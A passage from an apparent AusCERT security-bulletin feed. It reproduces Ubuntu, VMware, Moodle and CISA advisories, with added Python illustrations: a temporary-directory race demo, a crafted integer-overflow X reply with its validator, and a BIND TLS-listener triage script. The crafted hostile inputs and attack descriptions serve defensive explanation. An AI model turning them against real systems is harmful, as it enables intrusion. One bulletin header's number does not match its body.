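        result["unsafe_reused_attacker_dir"] = victim == attacker_dir
        try:
            verify_private_dir(victim)
            result["unsafe_passes_check"] = True
        except PermissionError:
            result["unsafe_passes_check"] = False

        safe = safe_workdir(shared_tmp, "myapp")
        result["safe_is_fresh"] = safe != attacker_dir
        result["safe_mode"] = stat.S_IMODE(os.lstat(safe).st_mode)
        return result


if __name__ == "__main__":
    print(run_demo())
```

The ownership and mode check on its own does not close the race (an attacker who wins it can still hand you a directory they own); what removes it is the exclusive create with an unguessable name in safe_workdir. Giving the service a private work directory outside the shared temporary directory, owned by the service account, avoids the shared-namespace problem entirely.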
19 May 2022

ESB-2022.2446 - [Ubuntu] libXrandr: CVSS (Max): 9.8

ESB-2022.2446
USN-5428-1: libXrandr vulnerabilities
19 May 2022

AusCERT Security Bulletin Summary
---------------------------------
Product:           libXrandr
Publisher:         Ubuntu
Operating System:  Ubuntu
Resolution:        Patch/Upgrade
CVE Names:         CVE-2016-7948 CVE-2016-7947
Original Bulletin: https://ubuntu.com/security/notices/USN-5428-1

Comment: CVSS (Max): 9.8 CVE-2016-7948 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: NVD
Calculator: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

- --------------------------BEGIN INCLUDED TEXT--------------------

USN-5428-1: libXrandr vulnerabilities
18 May 2022

Several security issues were fixed in libXrandr.

Releases
o Ubuntu 16.04 ESM

Packages
o libxrandr - X11 RandR extension library

Details
Tobias Stoeckmann discovered that libXrandr incorrectly handled certain responses. An attacker could possibly use this issue to cause a denial of service, or possibly execute arbitrary code. (CVE-2016-7947, CVE-2016-7948)

Update instructions
The problem can be corrected by updating your system to the following package versions:

Ubuntu 16.04
o libxrandr2 - 2:1.5.0-1ubuntu0.1~esm1
  Available with UA Infra or UA Desktop

In general, a standard system update will make all the necessary changes.

References
o CVE-2016-7947
o CVE-2016-7948

- --------------------------END INCLUDED TEXT--------------------
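The two libXrandr issues in ESB-2022.2446 above are integer overflows and missing bounds checks in how the client library sizes buffers from counts supplied by the X server, which is why a "response" can be crafted: the flaw is on the client side, and the exposure is a client that talks to a hostile or compromised X server (for example over a forwarded X connection). The following is an added Python illustration of that bug class, not libXrandr's code; the reply layout (five little-endian 32-bit fields followed by the payload) and the per-item sizes are constructed for the demonstration.

```python
"""Added illustration of the bug class behind the libXrandr fixes: buffer sizes
derived from counts the X server supplies, computed in 32-bit arithmetic that can
wrap.  This is not libXrandr's code; the reply layout (five little-endian 32-bit
fields, then the payload) and the per-item sizes are constructed for the demo."""
import struct

WORD = 4                      # X protocol reply lengths are counted in 4-byte units
U32_MASK = 0xFFFFFFFF
CRTC_SIZE, OUTPUT_SIZE, MODEINFO_SIZE = 4, 4, 32   # assumed per-item sizes
HEADER = struct.Struct("<IIIII")   # length_words, n_crtcs, n_outputs, n_modes, names_bytes


def encode_reply(n_crtcs, n_outputs, n_modes, names_bytes, payload=b"") -> bytes:
    """Build a reply as a (possibly hostile) server would: the declared length
    covers only the bytes actually sent; the counts are whatever the server says."""
    length_words = (len(payload) + WORD - 1) // WORD
    return HEADER.pack(length_words, n_crtcs, n_outputs, n_modes, names_bytes) + payload


def required_bytes(n_crtcs, n_outputs, n_modes, names_bytes) -> int:
    """Bytes the counts really describe, computed with unbounded integers."""
    return (n_crtcs * CRTC_SIZE + n_outputs * OUTPUT_SIZE
            + n_modes * MODEINFO_SIZE + names_bytes)


def wrapped_required_bytes(n_crtcs, n_outputs, n_modes, names_bytes) -> int:
    """The same sum as a 32-bit C expression sees it: it wraps silently, so a huge
    request can look tiny, and a buffer allocated at that size is then overrun."""
    return required_bytes(n_crtcs, n_outputs, n_modes, names_bytes) & U32_MASK


def validate_reply(data: bytes) -> tuple:
    """Return (ok, reason).  Reject, before allocating anything, a reply whose
    counts do not fit inside the length the reply actually carries."""
    if len(data) < HEADER.size:
        return False, "truncated header"
    length_words, n_crtcs, n_outputs, n_modes, names_bytes = HEADER.unpack_from(data)
    declared = length_words * WORD
    if len(data) - HEADER.size < declared:
        return False, "payload shorter than declared length"
    needed = required_bytes(n_crtcs, n_outputs, n_modes, names_bytes)
    if needed > declared:
        return False, f"counts require {needed} bytes but reply carries {declared}"
    return True, "ok"


if __name__ == "__main__":
    benign = encode_reply(2, 3, 1, 8, b"\0" * 60)
    # 2^30 CRTCs * 4 bytes is exactly 2^32, which wraps to 0 in 32-bit arithmetic.
    hostile = encode_reply(0x40000000, 0, 0, 16, b"\0" * 16)
    print(validate_reply(benign))
    print(wrapped_required_bytes(0x40000000, 0, 0, 16), validate_reply(hostile))
```

The check compares what the counts imply against what was actually received, using arithmetic that cannot wrap; in C the equivalent is to test each count against a per-field ceiling before multiplying, or to use overflow-checked multiplication, and never to trust the sum alone.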
19 May 2022

ESB-2022.2445 - [Ubuntu] bind9: CVSS (Max): 7.5

ESB-2022.2445
USN-5429-1: Bind vulnerability
19 May 2022

AusCERT Security Bulletin Summary
---------------------------------
Product:           bind9
Publisher:         Ubuntu
Operating System:  Ubuntu
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-1183
Original Bulletin: https://ubuntu.com/security/notices/USN-5429-1

Comment: CVSS (Max): 7.5 CVE-2022-1183 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVSS Source: Red Hat
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

- --------------------------BEGIN INCLUDED TEXT--------------------

USN-5429-1: Bind vulnerability
18 May 2022

Bind could be made to crash if it received specially crafted network traffic.

Releases
o Ubuntu 22.04 LTS

Packages
o bind9 - Internet Domain Name Server

Details
Thomas Amgarten discovered that Bind incorrectly handled certain TLS connections being destroyed. A remote attacker could possibly use this issue to cause Bind to crash, resulting in a denial of service.

Update instructions
The problem can be corrected by updating your system to the following package versions:

Ubuntu 22.04
o bind9 - 1:9.18.1-1ubuntu1.1

In general, a standard system update will make all the necessary changes.

References
o CVE-2022-1183

- --------------------------END INCLUDED TEXT--------------------
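CVE-2022-1183 in ESB-2022.2445 above is triggered by a TLS connection being torn down early, so the crafted traffic only reaches a named instance that exposes a TLS listener (DNS over TLS or DNS over HTTPS, configured with the tls option on listen-on / listen-on-v6). Plain port 53 resolvers are not reachable by it, which is useful when deciding which servers to update first, although the package update applies to all of them. The following added Python check is not part of the Ubuntu notice; it lists the TLS-enabled listeners in a named.conf, and the configuration text it runs on is a constructed sample.

```python
"""Added triage check for CVE-2022-1183: list the listen-on / listen-on-v6
statements in a BIND 9 named.conf that use a tls block.  Not part of the Ubuntu
notice; the configuration text below is a constructed sample."""
import re

SAMPLE_NAMED_CONF = """
options {
    directory "/var/cache/bind";
    listen-on port 53 { any; };
    listen-on-v6 { any; };
    // DNS over TLS on 853, using the tls block "local-tls"
    listen-on port 853 tls local-tls { any; };
    listen-on-v6 port 853 tls local-tls { any; };
    /* DNS over HTTPS */
    listen-on port 443 tls local-tls http default { any; };
    # an explicit "tls none" is plain DNS and must not be reported
    listen-on port 5353 tls none { any; };
};

tls local-tls {
    key-file "/etc/bind/server.key";
    cert-file "/etc/bind/server.crt";
};
"""

# Block (/* */), line (//) and shell-style (#) comments, as named.conf allows them.
_COMMENT_RE = re.compile(r"/\*.*?\*/|//[^\n]*|#[^\n]*", re.DOTALL)
# A listen-on or listen-on-v6 statement up to its opening brace; the options
# (port N, tls NAME, http NAME, ...) sit between the keyword and the brace.
_LISTEN_RE = re.compile(r"\b(listen-on(?:-v6)?)\b([^{;]*)\{")


def strip_comments(conf: str) -> str:
    return _COMMENT_RE.sub("", conf)


def tls_listeners(conf: str) -> list:
    """Return (statement, port, tls_name, http_name) for each TLS-enabled listener.
    http_name is None for DoT and the http block name for DoH."""
    found = []
    for m in _LISTEN_RE.finditer(strip_comments(conf)):
        statement, opts = m.group(1), m.group(2).split()
        port, tls_name, http_name = 53, None, None
        for i in range(len(opts) - 1):
            key, value = opts[i], opts[i + 1]
            if key == "port":
                port = int(value)
            elif key == "tls":
                tls_name = value
            elif key == "http":
                http_name = value
        if tls_name is None or tls_name == "none":
            continue                       # plain DNS listener, not affected
        found.append((statement, port, tls_name, http_name))
    return found


if __name__ == "__main__":
    for entry in tls_listeners(SAMPLE_NAMED_CONF):
        print("TLS listener:", entry)
```

Run it over the named.conf of each resolver (including any files it pulls in with include, which this check does not follow); an empty result means the instance has no TLS listener and the crash is not reachable on it, while any result means the instance should be updated ahead of the others.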
19 May 2022

ESB-2022.2444 - [Ubuntu] gnome-control-center: CVSS (Max): None

ESB-2022.2444
USN-5430-1: GNOME Settings vulnerability
19 May 2022

AusCERT Security Bulletin Summary
---------------------------------
Product:           gnome-control-center
Publisher:         Ubuntu
Operating System:  Ubuntu
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-1736
Original Bulletin: https://ubuntu.com/security/notices/USN-5430-1

Comment: CVSS (Max): None available when published

- --------------------------BEGIN INCLUDED TEXT--------------------

USN-5430-1: GNOME Settings vulnerability
18 May 2022

GNOME Settings could allow unintended access to network services.

Releases
o Ubuntu 22.04 LTS

Packages
o gnome-control-center - utilities to configure the GNOME desktop

Details
It was discovered that GNOME Settings incorrectly handled the remote desktop sharing configuration. When turning off desktop sharing, it may be turned on again after rebooting, contrary to expectations.

Update instructions
The problem can be corrected by updating your system to the following package versions:

Ubuntu 22.04
o gnome-control-center - 1:41.4-1ubuntu13.2

After a standard system update you need to reboot your computer to make all the necessary changes.

References
o CVE-2022-1736

- --------------------------END INCLUDED TEXT--------------------
19 May 2022

ESB-2022.2443 - [Win][Linux][Virtual] VMware Products: CVSS (Max): 9.8

ESB-2022.2443
Critical Severity - VMSA-2022-0014 - VMware Workspace ONE Access, Identity Manager and vRealize Automation updates address multiple vulnerabilities
19 May 2022

AusCERT Security Bulletin Summary
---------------------------------
Product:           VMware Workspace ONE Access (Access)
                   VMware Identity Manager (vIDM)
                   VMware vRealize Automation (vRA)
                   VMware Cloud Foundation
                   vRealize Suite Lifecycle Manager
Publisher:         VMware
Operating System:  Linux variants
                   Virtualisation
                   Windows
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-22973 CVE-2022-22972
Original Bulletin: https://www.vmware.com/security/advisories/VMSA-2022-0014.html

Comment: CVSS (Max): 9.8 CVE-2022-22972 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: VMware
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

- --------------------------BEGIN INCLUDED TEXT--------------------

Critical
Advisory ID: VMSA-2022-0014
CVSSv3 Range: 7.8-9.8
Issue Date: 2022-05-18
Updated On: 2022-05-18
CVE(s): CVE-2022-22972, CVE-2022-22973
Synopsis: VMware Workspace ONE Access, Identity Manager and vRealize Automation updates address multiple vulnerabilities.

1. Impacted Products
o VMware Workspace ONE Access (Access)
o VMware Identity Manager (vIDM)
o VMware vRealize Automation (vRA)
o VMware Cloud Foundation
o vRealize Suite Lifecycle Manager

2. Introduction
Multiple vulnerabilities were privately reported to VMware. Patches are available to remediate these vulnerabilities in affected VMware products.

3a. Authentication Bypass Vulnerability (CVE-2022-22972)

Description
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.

Known Attack Vectors
A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.

Resolution
To remediate CVE-2022-22972, apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

Workarounds
Workarounds for CVE-2022-22972 have been documented in the VMware Knowledge Base articles listed in the 'Workarounds' column of the 'Response Matrix' below.

Additional Documentation
A supplemental blog post was created for additional clarification. Please see: https://via.vmw.com/vmsa-2022-0014-qna

Notes
None.

Acknowledgements
VMware would like to thank Bruno Lopez of Innotec Security for reporting this vulnerability to us.

3b. Local Privilege Escalation Vulnerability (CVE-2022-22973)

Description
VMware Workspace ONE Access and Identity Manager contain a privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8.

Known Attack Vectors
A malicious actor with local access can escalate privileges to 'root'.

Resolution
To remediate CVE-2022-22973, apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

Workarounds
None.

Additional Documentation
A supplemental blog post was created for additional clarification. Please see: https://via.vmw.com/vmsa-2022-0014-qna

Notes
None.

Acknowledgements
VMware would like to thank Kai Zhao of ToTU Security Team and Steven Yu for independently reporting this issue to us.
Response Matrix Product Version Running CVE Identifier CVSSv3 Severity Fixed Workarounds Additional On Version Documentation Access 21.08.0.1, Linux CVE-2022-22972 9.8 critical KB88438 KB88433 FAQ 21.08.0.0 Access 21.08.0.1, Linux CVE-2022-22973 7.8 important KB88438 None FAQ 21.08.0.0 Access 20.10.0.1, Linux CVE-2022-22972 9.8 critical KB88438 KB88433 FAQ 20.10.0.0 Access 20.10.0.1, Linux CVE-2022-22973 7.8 important KB88438 None FAQ 20.10.0.0 3.3.6, vIDM 3.3.5, Linux CVE-2022-22972 9.8 critical KB88438 KB88433 FAQ 3.3.4, 3.3.3 3.3.6, vIDM 3.3.5, Linux CVE-2022-22973 7.8 important KB88438 None FAQ 3.3.4, 3.3.3 vRealize CVE-2022-22972, Automation 8.x Linux CVE-2022-22973 N/A N/A Unaffected N/A N/A [1] vRealize Automation 7.6 Linux CVE-2022-22972 9.8 critical KB88438 KB88433 FAQ (vIDM) [2] vRealize Automation 7.6 Linux CVE-2022-22973 N/A N/A Unaffected N/A N/A (vIDM) [1] vRealize Automation 8.x is unaffected since it does not use embedded vIDM. If vIDM has been deployed with vRA 8.x, fixes should be applied directly to vIDM. [2] vRealize Automation 7.6 is affected since it uses embedded vIDM. Impacted Product Suites that Deploy Response Matrix Components: Product Version Running CVE Identifier CVSSv3 Severity Fixed Workarounds Additional On Version Documentation VMware 4.3.x, Cloud 4.2.x, Any CVE-2022-22972 9.8 critical KB88438 KB88433 FAQ Foundation 4.1, (vIDM) 4.0.x VMware 4.3.x, Cloud 4.2.x, Any CVE-2022-22973 7.8 important KB88438 None FAQ Foundation 4.1, (vIDM) 4.0.x VMware Cloud 3.x Any CVE-2022-22972 9.8 critical KB88438 KB88433 FAQ Foundation (vRA) vRealize Suite Lifecycle 8.x Any CVE-2022-22972 9.8 critical KB88438 KB88433 FAQ Manager (vIDM) vRealize Suite Lifecycle 8.x Any CVE-2022-22973 7.8 important KB88438 None FAQ Manager (vIDM) 4. 
References Fixed Version(s): https://kb.vmware.com/s/article/88438 Workarounds: https://kb.vmware.com/s/article/88433 Mitre CVE Dictionary Links: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22972 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22973 FIRST CVSSv3 Calculator: CVE-2022-22972: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2022-22973: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 5. Change Log 2022-05-18: VMSA-2022-0014 Initial security advisory. 6. Contact E-mail list for product security notifications and announcements: https://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: security-announce@lists.vmware.com bugtraq@securityfocus.com fulldisclosure@seclists.org E-mail: security@vmware.com PGP key at: https://kb.vmware.com/kb/1055 VMware Security Advisories https://www.vmware.com/security/advisories VMware Security Response Policy https://www.vmware.com/support/policies/security_response.html VMware Lifecycle Support Phases https://www.vmware.com/support/policies/lifecycle.html VMware Security & Compliance Blog https://blogs.vmware.com/security Twitter https://twitter.com/VMwareSRC - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. 
The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. 
18 May 2022

ESB-2022.2442 - [Win][UNIX/Linux] Moodle: CVSS (Max): None

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2022.2442
            MSA-22-0014: Failed login attempts counted incorrectly
                                18 May 2022
===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Moodle
Publisher:         Moodle
Operating System:  UNIX variants (UNIX, Linux, OSX)
                   Windows
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-30600

Original Bulletin:
   https://moodle.org/mod/forum/discuss.php?d=434582&parent=1748726

Comment: CVSS (Max):  None available when published

- --------------------------BEGIN INCLUDED TEXT--------------------

MSA-22-0014: Failed login attempts counted incorrectly

An issue in the logic used to count failed login attempts could result in the
account lockout threshold being bypassed.

Severity/Risk:      Serious
Versions affected:  4.0, 3.11 to 3.11.6, 3.10 to 3.10.10, 3.9 to 3.9.13 and
                    earlier unsupported versions
Versions fixed:     4.0.1, 3.11.7, 3.10.11 and 3.9.14
Reported by:        Shamim Rezaie
CVE identifier:     CVE-2022-30600
Changes (master):   http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-73736
Tracker issue:      MDL-73736 Failed login attempts counted incorrectly

- --------------------------END INCLUDED TEXT--------------------
18 May 2022

ESB-2022.2441 - [Win][UNIX/Linux] Moodle: CVSS (Max): None

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2022.2441
          MSA-22-0013: SQL injection risk in badge award criteria
                                18 May 2022
===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Moodle
Publisher:         Moodle
Operating System:  UNIX variants (UNIX, Linux, OSX)
                   Windows
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-30599

Original Bulletin:
   https://moodle.org/mod/forum/discuss.php?d=434581&parent=1748725

Comment: CVSS (Max):  None available when published

- --------------------------BEGIN INCLUDED TEXT--------------------

MSA-22-0013: SQL injection risk in badge award criteria

An SQL injection risk was identified in Badges code relating to configuring
criteria.

NOTE: in Moodle 4.0, 3.11.6, 3.10.10 and 3.9.13, access to this vulnerability
was available to site administrators only. In earlier versions, access to the
relevant capability was also limited to teachers and managers by default.

Severity/Risk:      Serious
Versions affected:  4.0, 3.11 to 3.11.6, 3.10 to 3.10.10, 3.9 to 3.9.13 and
                    earlier unsupported versions
Versions fixed:     4.0.1, 3.11.7, 3.10.11 and 3.9.14
Reported by:        Michael Dunstan
Workaround:         In versions earlier than Moodle 4.0, 3.11.6, 3.10.10 and
                    3.9.13, remove the moodle/badges:configurecriteria
                    capability from users to prevent them accessing the
                    affected functionality until the patch is applied (in
                    newer versions this is not necessary).
CVE identifier:     CVE-2022-30599
Changes (master):   http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-74333
Tracker issue:      MDL-74333 SQL injection risk in badge award criteria

- --------------------------END INCLUDED TEXT--------------------
18 May 2022

ESB-2022.2440 - [Win][UNIX/Linux] Moodle: CVSS (Max): None

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2022.2440
   MSA-22-0012: Global search results reveal authors of content unexpectedly
                             for some activities
                                18 May 2022
===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Moodle
Publisher:         Moodle
Operating System:  UNIX variants (UNIX, Linux, OSX)
                   Windows
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-30598

Original Bulletin:
   https://moodle.org/mod/forum/discuss.php?d=434580&parent=1748724

Comment: CVSS (Max):  None available when published

- --------------------------BEGIN INCLUDED TEXT--------------------

MSA-22-0012: Global search results reveal authors of content unexpectedly for
some activities

Global search results could include author information on some activities
where a user may not otherwise have access to it.

Severity/Risk:      Minor
Versions affected:  4.0, 3.11 to 3.11.6, 3.10 to 3.10.10, 3.9 to 3.9.13 and
                    earlier unsupported versions
Versions fixed:     4.0.1, 3.11.7, 3.10.11 and 3.9.14
Reported by:        Catalina
CVE identifier:     CVE-2022-30598
Changes (master):   http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-71623
Tracker issue:      MDL-71623 Global search results reveal authors of content
                    unexpectedly for some activities

- --------------------------END INCLUDED TEXT--------------------
18 May 2022

ESB-2022.2439 - [Win][UNIX/Linux] Moodle: CVSS (Max): None

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2022.2439
  MSA-22-0011: Description field hidden by user policies (hiddenuserfields)
                               is still visible
                                18 May 2022
===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Moodle
Publisher:         Moodle
Operating System:  UNIX variants (UNIX, Linux, OSX)
                   Windows
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-30597

Original Bulletin:
   https://moodle.org/mod/forum/discuss.php?d=434579&parent=1748723

Comment: CVSS (Max):  None available when published

- --------------------------BEGIN INCLUDED TEXT--------------------

MSA-22-0011: Description field hidden by user policies (hiddenuserfields) is
still visible

The description user field was not hidden when being set as a hidden user
field.

Severity/Risk:      Minor
Versions affected:  4.0, 3.11 to 3.11.6, 3.10 to 3.10.10, 3.9 to 3.9.13 and
                    earlier unsupported versions
Versions fixed:     4.0.1, 3.11.7, 3.10.11 and 3.9.14
Reported by:        Bo Foght
CVE identifier:     CVE-2022-30597
Changes (master):   http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-74318
Tracker issue:      MDL-74318 Description field hidden by user policies
                    (hiddenuserfields) is still visible

- --------------------------END INCLUDED TEXT--------------------
18 May 2022

ESB-2022.2426 - [Win][UNIX/Linux] Moodle: CVSS (Max): None

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2022.2438
      MSA-22-0010: Stored XSS in assignment bulk marker allocation form
                             via user ID number
                                18 May 2022
===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Moodle
Publisher:         Moodle
Operating System:  UNIX variants (UNIX, Linux, OSX)
                   Windows
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-30596

Original Bulletin:
   https://moodle.org/mod/forum/discuss.php?d=434578&parent=1748722

Comment: CVSS (Max):  None available when published

- --------------------------BEGIN INCLUDED TEXT--------------------

MSA-22-0010: Stored XSS in assignment bulk marker allocation form via user ID
number

ID numbers displayed when bulk allocating markers to assignments required
additional sanitizing to prevent a stored XSS risk.

Severity/Risk:      Minor
Versions affected:  4.0, 3.11 to 3.11.6, 3.10 to 3.10.10, 3.9 to 3.9.13 and
                    earlier unsupported versions
Versions fixed:     4.0.1, 3.11.7, 3.10.11 and 3.9.14
Reported by:        Paul Holden
CVE identifier:     CVE-2022-30596
Changes (master):   http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-74204
Tracker issue:      MDL-74204 Stored XSS in assignment bulk marker allocation
                    form via user ID number

- --------------------------END INCLUDED TEXT--------------------
18 May 2022

ESB-2022.2437 - [Appliance] Circutor COMPACT DC-S BASIC: CVSS (Max): 6.8

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2437 Advisory (icsa-22-137-01) Circutor COMPACT DC-S BASIC 18 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Circutor COMPACT DC-S BASIC Publisher: ICS-CERT Operating System: Network Appliance Resolution: Mitigation CVE Names: CVE-2022-1669 Original Bulletin: https://us-cert.cisa.gov/ics/advisories/icsa-22-137-01 Comment: CVSS (Max): 6.8 CVE-2022-1669 (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H) CVSS Source: ICS-CERT Calculator: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H - --------------------------BEGIN INCLUDED TEXT-------------------- ICS Advisory (ICSA-22-137-01) Circutor COMPACT DC-S BASIC Original release date: May 17, 2022 Legal Notice All information products included in https://us-cert.cisa.gov/ics are provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/ . 1. EXECUTIVE SUMMARY o CVSS v3 6.8 o ATTENTION: Exploitable remotely/low attack complexity o Vendor: Circutor o Equipment: COMPACT DC-S BASIC o Vulnerability: Stack-based Buffer Overflow 2. RISK EVALUATION Successful exploitation of this vulnerability could cause a buffer overflow condition resulting in remote code execution. 3. 
TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following versions of Circutor COMPACT DC-S BASIC, a smart metering concentrator, are affected: o Circutor COMPACT DC-S BASIC: CIR_CDC_v1.2.17 3.2 VULNERABILITY OVERVIEW 3.2.1 STACK-BASED BUFFER OVERFLOW CWE-121 A buffer overflow vulnerability has been detected in the firewall function of the device management web portal. The device runs a CGI binary (index.cgi) to offer a management web application. Once authenticated with valid credentials in this web portal, a potential attacker could submit any "Address" value and it would be copied to a second variable with a "strcpy" vulnerable function without checking its length. Because of this, it is possible to send a long address value to overflow the process stack, controlling the function return address. CVE-2022-1669 has been assigned to this vulnerability. A CVSS v3 base score of 6.8 has been assigned; the CVSS vector string is ( AV:N/AC:H/PR:L/UI:N/S:U/C:N/ I:H/A:H ). 3.3 BACKGROUND o CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing o COUNTRIES/AREAS DEPLOYED: Worldwide o COMPANY HEADQUARTERS LOCATION: Spain 3.4 RESEARCHER Angel Garcia Moreno reported this vulnerability to CISA. 4. MITIGATIONS Circutor has not responded to requests to work with CISA to mitigate this vulnerability. Users of these affected products are invited to contact Circutor customer support for additional information. CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should: o Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the Internet . o Locate control system networks and remote devices behind firewalls and isolate them from the business network. o When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. 
    Also recognize VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk
assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices
on the ICS webpage on cisa.gov. Several recommended practices are available for
reading and download, including Improving Industrial Control Systems
Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available
on the ICS webpage on cisa.gov in the Technical Information Paper,
ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation
Strategies.

Organizations observing any suspected malicious activity should follow their
established internal procedures and report their findings to CISA for tracking
and correlation against other incidents.

No known public exploits specifically target this vulnerability.

For any questions related to this report, please contact the CISA at:

Email: CISAservicedesk@cisa.dhs.gov
Toll Free: 1-888-282-0870

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If you do
not know who that is, please send an email to auscert@auscert.org.au and we
will forward your request to the appropriate person.

NOTE: Third Party Rights

This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures.

AusCERT takes no responsibility for consequences which may arise from
following or acting on information or advice contained in this security
bulletin.

NOTE: This is only the original release of the security bulletin. It may not
be updated when updates to the original are made. If downloading at a later
date, it is recommended that the bulletin is retrieved directly from the
author's website to ensure that the information is still current.

Contact information for the authors of the original document is included in
the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
